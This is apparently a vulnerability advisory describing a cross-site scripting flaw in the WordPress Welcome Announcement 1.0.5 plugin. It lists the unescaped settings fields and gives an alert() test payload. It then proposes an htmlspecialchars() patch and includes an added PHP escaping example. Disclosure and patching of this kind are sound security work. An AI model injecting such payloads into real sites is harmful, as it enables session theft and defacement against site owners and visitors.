WordPress Welcome Announcement 1.0.5 Cross Site Scripting

2016.08.07
Credit: bl4ck_mohajem
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

#####################
# Exploit Title: WordPress Welcome Announcement Cross Site Scripting
# Exploit Author: bl4ck_mohajem
# Vendor Homepage: https://wordpress.org/plugins/welcome-announcement/
# Tested On: Windows7
# Software Link: https://downloads.wordpress.org/plugin/welcome-announcement.1.0.5.zip
# Version: 1.0.5
######################
# Vulnerable File and Codes:

wa_options.php
Lines(134-142-161-188-196-204-215-223-234-258-266)

<input class="entry" type="text" size=40 name="wa_opts[cookie_name]" value="<?php echo $wa_opts["cookie_name"]; ?>" />
<input class="entry" type="text" size=40 name='wa_opts[cookie_expiration]'value="<?php echo $wa_opts["cookie_expiration"]; ?>" />
<input class="entry" type="text" size=76 name='wa_opts[animation_name]' value="<?php echo $wa_opts["animation_name"]; ?>" />
<input class="entry" type="text" size=40 name='wa_opts[animation_width]' value="<?php echo $wa_opts["animation_width"]; ?>" />
<input class="entry" type="text" size=40 name='wa_opts[animation_height]' value="<?php echo $wa_opts["animation_height"]; ?>" />
<input class="entry" type="text" size=40 name='wa_opts[animation_bgcolor]' id="color_animation" onclick="showColorGrid2('color_animation','none');" value="<?php echo $wa_opts["animation_bgcolor"]; ?>" />
<input class="entry" type="text" size=40 name='wa_opts[veil_bgcolor]' id="color_veil" onclick="showColorGrid2('color_veil','none');" value="<?php echo $wa_opts["veil_bgcolor"]; ?>" />
<input class="entry" type="text" size=40 name='wa_opts[veil_transparency]' value="<?php echo $wa_opts["veil_transparency"]; ?>" />
<input class="entry" type="text" size=40 name='wa_opts[fade_in_duration]' value="<?php echo $wa_opts["fade_in_duration"]; ?>" />
<input class="entry" type="text" size=40 name='wa_opts[animation_duration]' value="<?php echo $wa_opts["animation_duration"]; ?>" />
<input class="entry" type="text" size=40 name='wa_opts[fade_out_duration]' value="<?php echo $wa_opts["fade_out_duration"]; ?>" />

######################
# Exploit :

To test for cross-site scripting, the following code can be used in any of the inputs above; all of them are vulnerable.

"><script>alert(/xss/)</script><

Address:
http://localhost/pentest/wordpress/wp-admin/themes.php?page=wa_options

######################
# Patch :

To fix this vulnerability, use the htmlspecialchars() function.

<input class="entry" type="text" size=40 name="wa_opts[cookie_name]" value="<?php echo htmlspecialchars($wa_opts["cookie_name"]); ?>" />

Apply the same change to the other lines listed above.

######################
# tnx: Milad Hacking - n1arash - bl4ck_li0n -malah_sky
######################
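
The patch above applied to every field through one helper, as an added example that is not the plugin's code or the advisory author's. esc_value() and render_input() are hypothetical names and the $wa_opts values are constructed; ENT_QUOTES is used because the listed markup mixes single- and double-quoted attributes.

```php
<?php
// Added example, not the plugin's code. esc_value() and render_input() are
// hypothetical helpers; $wa_opts holds constructed sample values.

// Escape a value for output inside a quoted HTML attribute.
function esc_value($value): string
{
    // ENT_QUOTES encodes both " and ', so the value cannot close the
    // attribute whichever quote style the markup uses. Before PHP 8.1 the
    // default flag set was ENT_COMPAT, which leaves ' unencoded.
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Build one settings field with the same markup as wa_options.php,
// with the stored value escaped.
function render_input(array $opts, string $key, int $size = 40): string
{
    return sprintf(
        '<input class="entry" type="text" size=%d name="wa_opts[%s]" value="%s" />',
        $size,
        esc_value($key),
        esc_value($opts[$key] ?? '')
    );
}

$wa_opts = [
    'cookie_name'     => '"><script>alert(/xss/)</script><', // test string from the advisory
    'animation_name'  => "it's.swf",  // benign value containing a single quote
    'animation_width' => '640',
];

foreach (array_keys($wa_opts) as $key) {
    $html = render_input($wa_opts, $key);
    // The escaped field must not contain a raw tag from the stored value.
    $status = (strpos($html, '<script') === false) ? 'ok  ' : 'FAIL';
    echo $status, ' ', $html, PHP_EOL;
}

// Flag comparison on the single-quote value: only ENT_QUOTES encodes it.
echo htmlspecialchars("it's.swf", ENT_COMPAT, 'UTF-8'), PHP_EOL;
echo htmlspecialchars("it's.swf", ENT_QUOTES, 'UTF-8'), PHP_EOL;
```

Inside WordPress itself, esc_attr() is the core function for escaping attribute values and can take the place of esc_value() here.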



Copyright 2024, cxsecurity.com

 
